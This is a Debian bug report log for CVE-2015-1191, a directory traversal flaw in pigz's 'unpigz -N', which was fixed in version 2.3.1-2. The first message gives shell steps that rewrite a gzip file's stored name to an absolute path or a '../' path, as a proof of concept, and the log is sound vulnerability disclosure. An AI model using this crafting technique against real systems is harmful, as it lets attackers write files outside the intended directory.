Debian Bug report logs -
#774978
pigz: CVE-2015-1191: directory traversal vulnerability
Reported by: Alexander Cherepanov <cherepan@mccme.ru>
Date: Fri, 9 Jan 2015 16:42:02 UTC
Severity: normal
Tags: security
Found in version pigz/2.3.1-1
Fixed in version pigz/2.3.1-2
Done: Eduard Bloch <blade@debian.org>
Bug is archived. No further changes may be made.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, Eduard Bloch <blade@debian.org>
:
Bug#774978
; Package pigz
.
(Fri, 09 Jan 2015 16:42:07 GMT) (full text, mbox, link).
Acknowledgement sent
to Alexander Cherepanov <cherepan@mccme.ru>
:
New Bug report received and forwarded. Copy sent to Eduard Bloch <blade@debian.org>
.
(Fri, 09 Jan 2015 16:42:07 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: pigz
Version: 2.3.1-1
Tags: security
pigz is susceptible to directory traversal vulnerabilities. While
decompressing a file with restoring file name, it (unlike gzip) will
happily use absolute and relative paths taken from the input. This can
be exploited by a malicious archive to write files outside the current
directory.
1. Absolute path.
A sample could be prepared in following way:
$ touch XtmpXabs
$ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
$ rm XtmpXabs
Then check it works:
$ ls /tmp/abs
ls: cannot access /tmp/abs: No such file or directory
$ unpigz -N abs.gz
$ ls /tmp/abs
/tmp/abs
2. Relative path with "..".
A sample could be prepared in following way:
$ rm ../rel
$ touch XXXrel
$ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
$ rm XXXrel
Then check it works:
$ ls ../rel
ls: cannot access ../rel: No such file or directory
$ unpigz -N rel.gz
$ ls ../rel
../rel
--
Alexander Cherepanov
Information forwarded
to debian-bugs-dist@lists.debian.org, Eduard Bloch <blade@debian.org>
:
Bug#774978
; Package pigz
.
(Sun, 18 Jan 2015 20:33:04 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>
:
Extra info received and forwarded to list. Copy sent to Eduard Bloch <blade@debian.org>
.
(Sun, 18 Jan 2015 20:33:04 GMT) (full text, mbox, link).
Message #10 received at 774978@bugs.debian.org (full text, mbox, reply):
Control: retitle -1 pigz: CVE-2015-1191: directory traversal vulnerability
Hi,
CVE-2015-1191 was assigned for this issue in pigz.
Regards,
Salvatore
Changed Bug title to 'pigz: CVE-2015-1191: directory traversal vulnerability' from 'pigz: directory traversal vulnerability'
Request was from Salvatore Bonaccorso <carnil@debian.org>
to 774978-submit@bugs.debian.org
.
(Sun, 18 Jan 2015 20:33:04 GMT) (full text, mbox, link).
Reply sent
to Eduard Bloch <blade@debian.org>
:
You have taken responsibility.
(Sun, 18 Jan 2015 23:21:08 GMT) (full text, mbox, link).
Notification sent
to Alexander Cherepanov <cherepan@mccme.ru>
:
Bug acknowledged by developer.
(Sun, 18 Jan 2015 23:21:08 GMT) (full text, mbox, link).
Message #17 received at 774978-close@bugs.debian.org (full text, mbox, reply):
Source: pigz
Source-Version: 2.3.1-2
We believe that the bug you reported is fixed in the latest version of
pigz, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 774978@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Eduard Bloch <blade@debian.org> (supplier of updated pigz package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Sun, 18 Jan 2015 23:58:51 +0100
Source: pigz
Binary: pigz
Architecture: source
Version: 2.3.1-2
Distribution: unstable
Urgency: high
Maintainer: Eduard Bloch <blade@debian.org>
Changed-By: Eduard Bloch <blade@debian.org>
Description:
pigz - Parallel Implementation of GZip
Closes: 774978
Changes:
pigz (2.3.1-2) unstable; urgency=high
.
* Patch(es) from upstream's SCM to solve handling of target file names with
the -N option (CVE-2015-1191, closes: #774978)
Checksums-Sha1:
5d8b2cde2befd3f50eb2f2b57095c10aa417fb13 1647 pigz_2.3.1-2.dsc
49577b466c87ccfd931e3ab3480406085156ecf0 5180 pigz_2.3.1-2.debian.tar.xz
Checksums-Sha256:
88888e0848d513a55e8ec22d03cf6747f271010019c03dad71160a35a2ee7d5f 1647 pigz_2.3.1-2.dsc
edcbc59e062416e2307bef52b88a914261b99b2497ffc1ac9cd606f310c9b02a 5180 pigz_2.3.1-2.debian.tar.xz
Files:
8eb78b4d666b26e8801a44104694218e 1647 utils extra pigz_2.3.1-2.dsc
ef4c4fab3d625f5b2ee7933bd5557e36 5180 utils extra pigz_2.3.1-2.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBVLw75Gl0DlyzX+w8AQhJYBAAp6mzf0Inigb0rFGKQ+83WwOcvdaS9rT7
gshIL2q8A2RYmOaHqF7Vq7O5reR9AvRJfE0Ukc5PEoOKmj0wn9rwETG2QOmdIIcW
FtNwX0wtDRqO5gqii/bRFSHN573LNMUEmr8ApcEQo0RkYUyrgoN2EzdUGihM0zSn
U7i5ErpiO/kRO2UKLq94cmcY4t0rRo9ITKCPnsbJ93/IRBHDh4n9oxMq886s4YxQ
gADUKfjPpOQWAKCYozFowm1M/D7K2+uW6Jtsd2cE4/uvBQanriS2vScfF1Vkc9Cz
StBgRPwZg/TAXo9lMq53L/HhtFpn0lnUnIm6eF89Ve5lMMnajdc7f7csEpNxwqTr
n1k5dgjYl8cHecroULDPoJ+z0RQ+0LXEHKEi+jOtEnUwbvk+o1IrFq9HvjGiveKf
onZqSmcgvOCtAvQg7QImcdj8BxEDhBk+VtCsJdH4oWh5pVQtLYgZBILccCXIqg/U
gLPdhGEArmDolURlKA1/YNgYGAWVUU5gHQEVe2Tar0Em/oiE/1l+SXmQFFHPMkwQ
8xfEXCxWE70hg69NhnyBCy98cNNDBIk/sA4pmRbJzEIjBTmZS1GmyaZVyBPl0dQ4
mxGjG9AC9Jkn9n2KjMhXVQbG1p9JiFuTvrFs6BuadRpVtZrE1OKH4m++z5KHorYI
oChrHC4bFjI=
=IEco
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org
.
(Mon, 23 Feb 2015 07:30:15 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 18:15:00 2019;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.